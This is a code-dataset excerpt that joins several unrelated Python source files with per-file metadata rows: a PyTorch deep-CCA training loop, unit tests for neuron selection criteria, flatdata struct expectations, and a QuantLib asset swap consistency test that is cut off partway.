if type == "13_5": model = model5_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_2": model = model_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_3": model = model_3_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_4": model = model_4_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_5": model = model_5_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "10000_2": model = model_10000s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
model = model.to(device)
model_optimizer = optim.Adam(model.parameters(), lr=learning_rate, weight_decay=reg_par)
print('MODEL : {}'.format(seed_num))
model.eval()
torch.cuda.empty_cache()
tr_loss = 0 ; count = 0
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
with torch.no_grad():
for trs in dataloader :
trs = trs.to(device)
outputs = model(trs)
loss = cca_loss(outputs, o_dim, use_all_singular_values)
tr_loss = tr_loss + loss
count = count + 1
del trs
tr_loss = tr_loss / count
data_val = data_val.to(device)
val_ops = model(data_val)
val_loss = cca_loss(val_ops, o_dim, use_all_singular_values)
data_val = data_val.cpu()
torch.cuda.empty_cache()
data_te = data_te.to(device)
test_ops = model(data_te)
test_loss = cca_loss(test_ops, o_dim, use_all_singular_values)
data_te = data_te.cpu()
torch.cuda.empty_cache()
models[seed_num] = model
first_and_last[seed_num] = [-tr_loss, -val_loss, -test_loss]
print('{:0.4f} {:0.4f} {:0.4f}'.format(-tr_loss, -val_loss, -test_loss))
np.set_printoptions(precision=4)
idx = np.argsort(-first_and_last[:,1])
print(first_and_last[idx,1:])
print(seeds[idx])
seed = seeds[idx[0]]
print("seed: ", seed )
torch.manual_seed(seed)
if torch.cuda.is_available() : torch.cuda.manual_seed_all(seed)
model = None
if type == "13_2": model = model2_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "13_3": model = model3_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "15_4": model = model2_15(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "13_5": model = model5_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_2": model = model_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_3": model = model_3_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_4": model = model_4_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_5": model = model_5_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "10000_2": model = model_10000s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
model = model.to(device)
model_optimizer = optim.Adam(model.parameters(), lr=learning_rate, weight_decay=reg_par)
model_state_dict = []
min_loss = 0.00 ; min_loss2 = 0.00
correlations = np.zeros((epoch_num, 3))
for epoch in range(epoch_num): # loop over the dataset multiple times
model.train()
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
for trs in dataloader :
model_optimizer.zero_grad()
trs = trs.to(device)
outputs = model(trs)
loss = cca_loss(outputs, o_dim, use_all_singular_values)
loss.backward()
model_optimizer.step()
del trs
model.eval()
torch.cuda.empty_cache()
tr_loss = 0
count = 0
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
with torch.no_grad():
for trs in dataloader :
trs = trs.to(device)
outputs = model(trs)
loss = cca_loss(outputs, o_dim, use_all_singular_values)
loss = loss.item()
tr_loss = tr_loss + loss
count = count + 1
del trs
correlations[epoch, 0] = -tr_loss / (count)
torch.cuda.empty_cache()
print('EPOCH : {}'.format(epoch))
print(' Training CORRELATION : {:0.4f}'.format(correlations[epoch, 0]))
data_val = data_val.to(device)
val_ops = model(data_val)
val_loss = cca_loss(val_ops, o_dim, use_all_singular_values)
correlations[epoch, 1] = -val_loss
data_val = data_val.cpu()
torch.cuda.empty_cache()
print(' Validation CORRELATION : {:0.4f}'.format(-val_loss))
data_te = data_te.to(device)
test_ops = model(data_te)
test_loss = cca_loss(test_ops, o_dim, use_all_singular_values)
correlations[epoch, 2] = -test_loss
data_te = data_te.cpu()
torch.cuda.empty_cache()
print(' Test CORRELATION : {:0.4f}'.format(-test_loss))
print(" val. loss is : {:0.4f} & the min. loss is : {:0.4f}".format(val_loss, min_loss))
print(" AND since, val_loss < min_loss is {}".format(val_loss < min_loss))
if val_loss < min_loss2:
min_loss2 = val_loss
model_file_name = path_name + '/best_model.pth'
if best_only == True:
if val_loss < min_loss or epoch == 0:
torch.save({
'epoch' : epoch,
'model_state_dict' : model.state_dict(),
'optimizer_state_dict': model_optimizer.state_dict(),
'loss': loss}, model_file_name)
print(' Saved the model at epoch : {}\n'.format(epoch))
min_loss = val_loss
else:
if epoch != 0:
checkpoint = torch.load(model_file_name)
model.load_state_dict(checkpoint['model_state_dict'])
model_optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
best_epoch = checkpoint['epoch']
# loss = checkpoint['loss']
print(' Loaded the model from epoch : {}.\n'.format(best_epoch))
model.train()
model.eval()
data2 = [data_tr, data_val, data_te]
with torch.no_grad():
new_data = []
for k in range(3):
temp = data2[k].to(device)
pred_out = model(temp)
new_data.append([pred_out[0].cpu().numpy(), pred_out[1].cpu().numpy()])
# x1 = new_data[2][0]
# x2 = new_data[2][1]
# result = np.squeeze(my_corr(x1, x2, o_dim))
# print(result)
return new_data, correlations, model
| 42.141304 | 239 | 0.595531 | 4,220 | 31,016 | 4.121564 | 0.074645 | 0.011499 | 0.022538 | 0.032197 | 0.860576 | 0.848387 | 0.826597 | 0.802047 | 0.794228 | 0.772897 | 0 | 0.027349 | 0.289141 | 31,016 | 735 | 240 | 42.198639 | 0.76152 | 0.14873 | 0 | 0.821293 | 0 | 0.005703 | 0.057174 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007605 | false | 0 | 0.032319 | 0 | 0.047529 | 0.095057 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
defa5ba8c7b7d2953ce455770a6e1c357bd3069e | 4,983 | py | Python | tests/test_selection_criteria.py | jofrony/Neuromodulation | b5e1502701399c02cecff20b85d4ff8af7772ec9 | [
"MIT"
] | 2 | 2021-12-21T11:10:45.000Z | 2021-12-21T11:11:04.000Z | tests/test_selection_criteria.py | jofrony/Neuromodcell | b5e1502701399c02cecff20b85d4ff8af7772ec9 | [
"MIT"
] | 1 | 2021-03-27T23:15:29.000Z | 2021-03-27T23:20:23.000Z | tests/test_selection_criteria.py | jofrony/Neuromodcell | b5e1502701399c02cecff20b85d4ff8af7772ec9 | [
"MIT"
] | 1 | 2021-03-27T23:13:48.000Z | 2021-03-27T23:13:48.000Z | import neuromodcell.selection_criteria as sc
import numpy as np
def test_number_AP_decrease():
voltage_control = np.array([-100, -100, 100, -100, -100, -100])
voltage = np.array([-100, -100, -100, -100, -100, -100])
criteria = {"selection": {"mean": 1, "std": 1, "threshold": 1}, "parameters": {'dt': 0.1}}
result = sc.number_AP_decrease(criteria, [voltage_control, voltage])
boolean = result['boolean']
zscore = result['zscore']
assert boolean == True
assert zscore == 0
def test_number_AP_increase():
voltage_control = np.array([-100, -100, -100, -100, -100, -100])
voltage = np.array([-100, -100, 100, -100, -100, -100])
criteria = {"selection": {"mean": 1, "std": 1, "threshold": 1}, "parameters": {'dt': 0.1}}
result = sc.number_AP_increase(criteria, [voltage_control, voltage])
boolean = result['boolean']
zscore = result['zscore']
assert boolean == True
assert zscore == 0
def test_frequency_change():
voltage_control = np.array([-100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100])
voltage = np.array([-100, 100, -100, 100, -100, 100, -100, 100, -100, 100, -100])
criteria = {"selection": {"mean": 5, "std": 1, "threshold": 1},
"parameters": {"tstart": 0, "tstop": 1000, 'dt': 100}}
result = sc.frequency_change(criteria, [voltage_control, voltage])
boolean = result['boolean']
zscore = result['zscore']
assert boolean == True
assert zscore == 0
def test_frequency_increase():
voltage_control = np.array([-100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100])
voltage = np.array([-100, 100, -100, 100, -100, 100, -100, 100, -100, 100, -100])
criteria = {"selection": {"mean": 5, "std": 1, "threshold": 1},
"parameters": {"tstart": 0, "tstop": 1000, 'dt': 100}}
result = sc.frequency_change_increase(criteria, [voltage_control, voltage])
boolean = result['boolean']
zscore = result['zscore']
assert boolean == True
assert zscore == 0
def test_frequency_decrease():
voltage_control = np.array([-100, 100, -100, 100, -100, 100, -100, 100, -100, 100, -100])
voltage = np.array([-100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100])
criteria = {"selection": {"mean": 5, "std": 1, "threshold": 1},
"parameters": {"tstart": 0, "tstop": 1000, 'dt': 100}}
result = sc.frequency_change_decrease(criteria, [voltage_control, voltage])
boolean = result['boolean']
zscore = result['zscore']
assert boolean == True
assert zscore == 0
def test_cv_change():
voltage_control = np.array([-100, 100, -100, 100, -100, 100, -100, 100, -100, 100, -100])
voltage = np.array([-100, -100, -100, 100, -100, -100, -100, 100, -100, 100, -100])
criteria = {"selection": {"mean": 0.333, "std": 1, "threshold": 1}, "parameters": {'dt': 100}}
result = sc.cv_change(criteria, [voltage_control, voltage])
boolean = result['boolean']
zscore = result['zscore']
assert boolean == True
def test_membrane_amplitude_increase():
voltage_control = np.array([-100, -100, -100, -100, -90, -90, -90, -90, -100, -100, -100, -100])
voltage = np.array([-100, -100, -100, -100, -80, -80, -80, -80, -100, -100, -100, -100])
criteria = {"selection": {"mean": 10, "std": 1, "threshold": 1},
"parameters": {'start_base': 0, 'stop_base': 0.2, 'start_measure': 0.4, 'stop_measure': 0.8, 'dt': 0.1}}
result = sc.membrane_amplitude_increase(criteria, [voltage_control, voltage])
boolean = result['boolean']
zscore = result['zscore']
assert boolean == True
assert zscore == 0
def test_membrane_amplitude_increase_percentage():
voltage_control = np.array([-100, -100, -100, -100, -90, -90, -90, -90, -100, -100, -100, -100])
voltage = np.array([-100, -100, -100, -100, -80, -80, -80, -80, -100, -100, -100, -100])
criteria = {"selection": {"mean": 200, "std": 1, "threshold": 1},
"parameters": {'start_base': 0, 'stop_base': 0.2, 'start_measure': 0.4, 'stop_measure': 0.8, 'dt': 0.1}}
result = sc.membrane_amplitude_increase_percentage(criteria, [voltage_control, voltage])
boolean = result['boolean']
zscore = result['zscore']
assert boolean == True
assert zscore == 0
def test_membrane_amplitude_decrease_percentage():
voltage_control = np.array([-100, -100, -100, -100, -80, -80, -80, -80, -100, -100, -100, -100])
voltage = np.array([-100, -100, -100, -100, -90, -90, -90, -90, -100, -100, -100, -100])
criteria = {"selection": {"mean": 50, "std": 1, "threshold": 1},
"parameters": {'start_base': 0, 'stop_base': 0.2, 'start_measure': 0.4, 'stop_measure': 0.8, 'dt': 0.1}}
result = sc.membrane_amplitude_decrease_percentage(criteria, [voltage_control, voltage])
boolean = result['boolean']
zscore = result['zscore']
assert boolean == True
assert zscore == 0
| 34.846154 | 120 | 0.601244 | 648 | 4,983 | 4.509259 | 0.08179 | 0.279261 | 0.344969 | 0.361396 | 0.959274 | 0.948323 | 0.939425 | 0.932238 | 0.932238 | 0.917864 | 0 | 0.157315 | 0.198876 | 4,983 | 142 | 121 | 35.091549 | 0.574649 | 0 | 0 | 0.636364 | 0 | 0 | 0.12342 | 0 | 0 | 0 | 0 | 0 | 0.193182 | 1 | 0.102273 | false | 0 | 0.022727 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
a0e8ac09bbc8bf9740d2eeb7260d972e1f3973bb | 99 | py | Python | tmp/test_c.py | wiki918/python_pytest_demo | 32180f726cabbd7685dda04e72aa111b00677930 | [
"BSD-3-Clause"
] | null | null | null | tmp/test_c.py | wiki918/python_pytest_demo | 32180f726cabbd7685dda04e72aa111b00677930 | [
"BSD-3-Clause"
] | null | null | null | tmp/test_c.py | wiki918/python_pytest_demo | 32180f726cabbd7685dda04e72aa111b00677930 | [
"BSD-3-Clause"
] | null | null | null | def test_c_1():
assert True
def test_c_2():
assert True
def test_c_3():
assert True
| 9.9 | 15 | 0.636364 | 18 | 99 | 3.166667 | 0.444444 | 0.368421 | 0.421053 | 0.596491 | 0.631579 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041667 | 0.272727 | 99 | 9 | 16 | 11 | 0.75 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a0f26b7bc6eb071bde286a7a88407f38a19ed08c | 659 | py | Python | flatdata-generator/tests/generators/py_expectations/structs/namespaces.py | gferon/flatdata | 8839fb36be105e496fea8acc3fc907ae878dd063 | [
"Apache-2.0"
] | null | null | null | flatdata-generator/tests/generators/py_expectations/structs/namespaces.py | gferon/flatdata | 8839fb36be105e496fea8acc3fc907ae878dd063 | [
"Apache-2.0"
] | null | null | null | flatdata-generator/tests/generators/py_expectations/structs/namespaces.py | gferon/flatdata | 8839fb36be105e496fea8acc3fc907ae878dd063 | [
"Apache-2.0"
] | 1 | 2021-07-16T07:51:16.000Z | 2021-07-16T07:51:16.000Z | class n_Foo(flatdata.structure.Structure):
""""""
_SCHEMA = """namespace n {
struct Foo
{
f : u32 : 32;
}
}
"""
_SIZE_IN_BITS = 32
_SIZE_IN_BYTES = 4
_FIELDS = {
"f": flatdata.structure.FieldSignature(offset=0, width=32, is_signed=False, dtype="u4"),
}
_FIELD_KEYS = {
"f",
}
class m_Foo(flatdata.structure.Structure):
""""""
_SCHEMA = """namespace m {
struct Foo
{
f : u32 : 32;
}
}
"""
_SIZE_IN_BITS = 32
_SIZE_IN_BYTES = 4
_FIELDS = {
"f": flatdata.structure.FieldSignature(offset=0, width=32, is_signed=False, dtype="u4"),
}
_FIELD_KEYS = {
"f",
}
| 17.342105 | 96 | 0.558422 | 78 | 659 | 4.410256 | 0.371795 | 0.197674 | 0.093023 | 0.168605 | 0.959302 | 0.959302 | 0.703488 | 0.703488 | 0.703488 | 0.703488 | 0 | 0.046414 | 0.280728 | 659 | 37 | 97 | 17.810811 | 0.679325 | 0 | 0 | 0.5625 | 0 | 0 | 0.166924 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9d0c51224de13c525b0522e8364009d1ee6fa542 | 189,319 | py | Python | QuantLib-SWIG/Python/test/assetswap.py | txu2014/quantlib | 95c7d94906c30d0c3c4e0758a2ebfe2a62b075ec | [
"BSD-3-Clause"
] | 1 | 2021-08-17T14:59:58.000Z | 2021-08-17T14:59:58.000Z | QuantLib-SWIG/Python/test/assetswap.py | txu2014/quantlib | 95c7d94906c30d0c3c4e0758a2ebfe2a62b075ec | [
"BSD-3-Clause"
] | 1 | 2019-02-20T05:37:59.000Z | 2019-02-20T05:37:59.000Z | QuantLib-SWIG/Python/test/assetswap.py | txu2014/quantlib | 95c7d94906c30d0c3c4e0758a2ebfe2a62b075ec | [
"BSD-3-Clause"
] | 1 | 2020-01-14T11:55:16.000Z | 2020-01-14T11:55:16.000Z | """
Copyright (C) 2011 Lluis Pujol Bajador
This file is part of QuantLib, a free-software/open-source library
for financial quantitative analysts and developers - http://quantlib.org/
QuantLib is free software: you can redistribute it and/or modify it
under the terms of the QuantLib license. You should have received a
copy of the license along with this program; if not, please email
<quantlib-dev@lists.sf.net>. The license is also available online at
<http://quantlib.org/license.shtml>.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the license for more details.
"""
from QuantLib import *
import unittest
class AssetSwapTest(unittest.TestCase):
def setUp(self):
# initial setup
self.termStructure = RelinkableYieldTermStructureHandle()
self.swapSettlementDays = 2
self.faceAmount = 100.0
self.fixedConvention = Unadjusted
self.compounding = Continuous
self.fixedFrequency = Annual
self.floatingFrequency = Semiannual
self.iborIndex = Euribor(Period(self.floatingFrequency), self.termStructure)
self.calendar = self.iborIndex.fixingCalendar()
self.swapIndex= SwapIndex("EuriborSwapIsdaFixA", Period(10,Years), self.swapSettlementDays,
self.iborIndex.currency(), self.calendar,
Period(self.fixedFrequency), self.fixedConvention,
self.iborIndex.dayCounter(), self.iborIndex)
self.spread = 0.0
self.nonnullspread = 0.003
self.today = Date(24,April,2007)
Settings.instance().evaluationDate = self.today
self.termStructure.linkTo(FlatForward(self.today, 0.05, Actual365Fixed()))
self.yieldCurve = FlatForward(self.today, 0.05, Actual365Fixed())
self.pricer = BlackIborCouponPricer()
self.swaptionVolatilityStructure = SwaptionVolatilityStructureHandle(ConstantSwaptionVolatility(self.today, NullCalendar(),Following,
0.2, Actual365Fixed()))
self.meanReversionQuote = QuoteHandle(SimpleQuote(0.01))
self.cmspricer = AnalyticHaganPricer(self.swaptionVolatilityStructure,
GFunctionFactory.Standard,
self.meanReversionQuote)
def testConsistency(self) :
"""Testing consistency between fair price and fair spread..."""
bondCalendar = TARGET()
settlementDays = 3
## Fixed Underlying bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
bondSchedule = Schedule(Date(4,January,2005),
Date(4,January,2037),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
bond = FixedRateBond(settlementDays, self.faceAmount,
bondSchedule,[0.04],
ActualActual(ActualActual.ISDA),
Following,
100.0, Date(4,January,2005))
payFixedRate = True
bondPrice = 95.0
isPar = True
parAssetSwap = AssetSwap(payFixedRate,
bond, bondPrice,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
swapEngine = DiscountingSwapEngine(self.termStructure,
True,
bond.settlementDate(),
Settings.instance().evaluationDate)
parAssetSwap.setPricingEngine(swapEngine)
fairCleanPrice = parAssetSwap.fairCleanPrice()
fairSpread = parAssetSwap.fairSpread()
tolerance = 1.0e-13
assetSwap2 = AssetSwap(payFixedRate, bond, fairCleanPrice,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
assetSwap2.setPricingEngine(swapEngine)
self.assertFalse(abs(assetSwap2.NPV())>tolerance,
"\npar asset swap fair clean price doesn't zero the NPV: "
+ "\n clean price: " + str(bondPrice)
+ "\n fair clean price: " + str(fairCleanPrice)
+ "\n NPV: " + str(assetSwap2.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap2.fairCleanPrice() - fairCleanPrice)>tolerance,
"\npar asset swap fair clean price doesn't equal input "
+ "clean price at zero NPV: "
+ "\n input clean price: " + str(fairCleanPrice)
+ "\n fair clean price: " + str(assetSwap2.fairCleanPrice())
+ "\n NPV: " + str(assetSwap2.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap2.fairSpread() - self.spread)>tolerance,
"\npar asset swap fair spread doesn't equal input spread "
+ "at zero NPV: "
+ "\n input spread: " + str(self.spread )
+ "\n fair spread: " + str(assetSwap2.fairSpread() )
+ "\n NPV: " + str(assetSwap2.NPV() )
+ "\n tolerance: " + str(tolerance))
assetSwap3 = AssetSwap(payFixedRate,
bond, bondPrice,
self.iborIndex, fairSpread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
assetSwap3.setPricingEngine(swapEngine)
self.assertFalse(abs(assetSwap3.NPV())>tolerance,
"\npar asset swap fair spread doesn't zero the NPV: "
+ "\n spread: " + str(self.spread)
+ "\n fair spread: " + str(fairSpread)
+ "\n NPV: " + str(assetSwap3.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap3.fairCleanPrice() - bondPrice)>tolerance,
"\npar asset swap fair clean price doesn't equal input "
+ "clean price at zero NPV: "
+ "\n input clean price: " + str(bondPrice)
+ "\n fair clean price: " + str(assetSwap3.fairCleanPrice())
+ "\n NPV: " + str(assetSwap3.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap3.fairSpread() - fairSpread)>tolerance,
"\npar asset swap fair spread doesn't equal input spread at"
+ " zero NPV: "
+ "\n input spread: " + str(fairSpread)
+ "\n fair spread: " + str(assetSwap3.fairSpread())
+ "\n NPV: " + str(assetSwap3.NPV())
+ "\n tolerance: " + str(tolerance))
## let's change the npv date
swapEngine = DiscountingSwapEngine(self.termStructure,
True,
bond.settlementDate(),
bond.settlementDate())
parAssetSwap.setPricingEngine(swapEngine)
## fair clean price and fair spread should not change
self.assertFalse(abs(parAssetSwap.fairCleanPrice() - fairCleanPrice)>tolerance,
"\npar asset swap fair clean price changed with NpvDate:"
+ "\n expected clean price: " + str(fairCleanPrice)
+ "\n fair clean price: " + str(parAssetSwap.fairCleanPrice())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(parAssetSwap.fairSpread() - fairSpread)>tolerance,
"\npar asset swap fair spread changed with NpvDate:"
+ "\n expected spread: " + str(fairSpread)
+ "\n fair spread: " + str(parAssetSwap.fairSpread())
+ "\n tolerance: " + str(tolerance))
assetSwap2 = AssetSwap(payFixedRate,
bond, fairCleanPrice,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
assetSwap2.setPricingEngine(swapEngine)
self.assertFalse(abs(assetSwap2.NPV())>tolerance,
"\npar asset swap fair clean price doesn't zero the NPV: "
+ "\n clean price: " + str(bondPrice)
+ "\n fair clean price: " + str(fairCleanPrice)
+ "\n NPV: " + str(assetSwap2.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap2.fairCleanPrice() - fairCleanPrice)>tolerance,
"\npar asset swap fair clean price doesn't equal input "
+ "clean price at zero NPV: "
+ "\n input clean price: " + str(fairCleanPrice)
+ "\n fair clean price: " + str(assetSwap2.fairCleanPrice())
+ "\n NPV: " + str(assetSwap2.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap2.fairSpread() - self.spread)>tolerance,
"\npar asset swap fair spread doesn't equal input spread at zero NPV: "
+ "\n input spread: " + str(self.spread)
+ "\n fair spread: " + str(assetSwap2.fairSpread())
+ "\n NPV: " + str(assetSwap2.NPV())
+ "\n tolerance: " + str(tolerance))
assetSwap3 = AssetSwap(payFixedRate,
bond, bondPrice,
self.iborIndex, fairSpread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
assetSwap3.setPricingEngine(swapEngine)
self.assertFalse(abs(assetSwap3.NPV())>tolerance,
"\npar asset swap fair spread doesn't zero the NPV: "
+ "\n spread: " + str(self.spread)
+ "\n fair spread: " + str(fairSpread)
+ "\n NPV: " + str(assetSwap3.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap3.fairCleanPrice() - bondPrice)>tolerance,
"\npar asset swap fair clean price doesn't equal input "
+ "clean price at zero NPV: "
+ "\n input clean price: " + str(bondPrice)
+ "\n fair clean price: " + str(assetSwap3.fairCleanPrice())
+ "\n NPV: " + str(assetSwap3.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap3.fairSpread() - fairSpread)>tolerance,
"\npar asset swap fair spread doesn't equal input spread at zero NPV: "
+ "\n input spread: " + str(fairSpread)
+ "\n fair spread: " + str(assetSwap3.fairSpread())
+ "\n NPV: " + str(assetSwap3.NPV())
+ "\n tolerance: " + str(tolerance))
## now market asset swap
isPar = False
mktAssetSwap = AssetSwap (payFixedRate,
bond, bondPrice,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
swapEngine = DiscountingSwapEngine(self.termStructure,
True,
bond.settlementDate(),
Settings.instance().evaluationDate)
mktAssetSwap.setPricingEngine(swapEngine)
fairCleanPrice = mktAssetSwap.fairCleanPrice()
fairSpread = mktAssetSwap.fairSpread()
assetSwap4 = AssetSwap (payFixedRate,
bond, fairCleanPrice,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
assetSwap4.setPricingEngine(swapEngine)
self.assertFalse(abs(assetSwap4.NPV())>tolerance,
"\nmarket asset swap fair clean price doesn't zero the NPV: "
+ "\n clean price: " + str(bondPrice)
+ "\n fair clean price: " + str(fairCleanPrice)
+ "\n NPV: " + str(assetSwap4.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap4.fairCleanPrice() - fairCleanPrice)>tolerance,
"\nmarket asset swap fair clean price doesn't equal input "
+ "clean price at zero NPV: "
+ "\n input clean price: " + str(fairCleanPrice)
+ "\n fair clean price: " + str(assetSwap4.fairCleanPrice())
+ "\n NPV: " + str(assetSwap4.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap4.fairSpread() - self.spread)>tolerance,
"\nmarket asset swap fair spread doesn't equal input spread"
+ " at zero NPV: "
+ "\n input spread: " + str(self.spread)
+ "\n fair spread: " + str(assetSwap4.fairSpread())
+ "\n NPV: " + str(assetSwap4.NPV())
+ "\n tolerance: " + str(tolerance))
assetSwap5 = AssetSwap(payFixedRate,
bond, bondPrice,
self.iborIndex, fairSpread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
assetSwap5.setPricingEngine(swapEngine)
self.assertFalse(abs(assetSwap5.NPV())>tolerance,
"\nmarket asset swap fair spread doesn't zero the NPV: "
+ "\n spread: " + str(self.spread)
+ "\n fair spread: " + str(fairSpread)
+ "\n NPV: " + str(assetSwap5.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap5.fairCleanPrice() - bondPrice)>tolerance,
"\nmarket asset swap fair clean price doesn't equal input "
+ "clean price at zero NPV: "
+ "\n input clean price: " + str(bondPrice)
+ "\n fair clean price: " + str(assetSwap5.fairCleanPrice())
+ "\n NPV: " + str(assetSwap5.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap5.fairSpread() - fairSpread)>tolerance,
"\nmarket asset swap fair spread doesn't equal input spread at zero NPV: "
+ "\n input spread: " + str(fairSpread)
+ "\n fair spread: " + str(assetSwap5.fairSpread())
+ "\n NPV: " + str(assetSwap5.NPV())
+ "\n tolerance: " + str(tolerance))
## let's change the npv date
swapEngine = DiscountingSwapEngine(self.termStructure,
True,
bond.settlementDate(),
bond.settlementDate())
mktAssetSwap.setPricingEngine(swapEngine)
## fair clean price and fair spread should not change
self.assertFalse(abs(mktAssetSwap.fairCleanPrice() - fairCleanPrice)>tolerance,
"\nmarket asset swap fair clean price changed with NpvDate:"
+ "\n expected clean price: " + str(fairCleanPrice)
+ "\n fair clean price: " + str(mktAssetSwap.fairCleanPrice())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(mktAssetSwap.fairSpread() - fairSpread)>tolerance,
"\nmarket asset swap fair spread changed with NpvDate:"
+ "\n expected spread: " + str(fairSpread)
+ "\n fair spread: " + str(mktAssetSwap.fairSpread())
+ "\n tolerance: " + str(tolerance))
assetSwap4 = AssetSwap(payFixedRate,
bond, fairCleanPrice,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
assetSwap4.setPricingEngine(swapEngine)
self.assertFalse(abs(assetSwap4.NPV())>tolerance,
"\nmarket asset swap fair clean price doesn't zero the NPV: "
+ "\n clean price: " + str(bondPrice)
+ "\n fair clean price: " + str(fairCleanPrice)
+ "\n NPV: " + str(assetSwap4.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap4.fairCleanPrice() - fairCleanPrice)>tolerance,
"\nmarket asset swap fair clean price doesn't equal input "
+ "clean price at zero NPV: "
+ "\n input clean price: " + str(fairCleanPrice)
+ "\n fair clean price: " + str(assetSwap4.fairCleanPrice())
+ "\n NPV: " + str(assetSwap4.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap4.fairSpread() - self.spread)>tolerance,
"\nmarket asset swap fair spread doesn't equal input spread at zero NPV: "
+ "\n input spread: " + str(self.spread)
+ "\n fair spread: " + str(assetSwap4.fairSpread())
+ "\n NPV: " + str(assetSwap4.NPV())
+ "\n tolerance: " + str(tolerance))
assetSwap5 = AssetSwap(payFixedRate,
bond, bondPrice,
self.iborIndex, fairSpread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
assetSwap5.setPricingEngine(swapEngine)
self.assertFalse(abs(assetSwap5.NPV())>tolerance,
"\nmarket asset swap fair spread doesn't zero the NPV: "
+ "\n spread: " + str(self.spread)
+ "\n fair spread: " + str(fairSpread)
+ "\n NPV: " + str(assetSwap5.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap5.fairCleanPrice() - bondPrice)>tolerance,
"\nmarket asset swap fair clean price doesn't equal input "
+ "clean price at zero NPV: "
+ "\n input clean price: " + str(bondPrice)
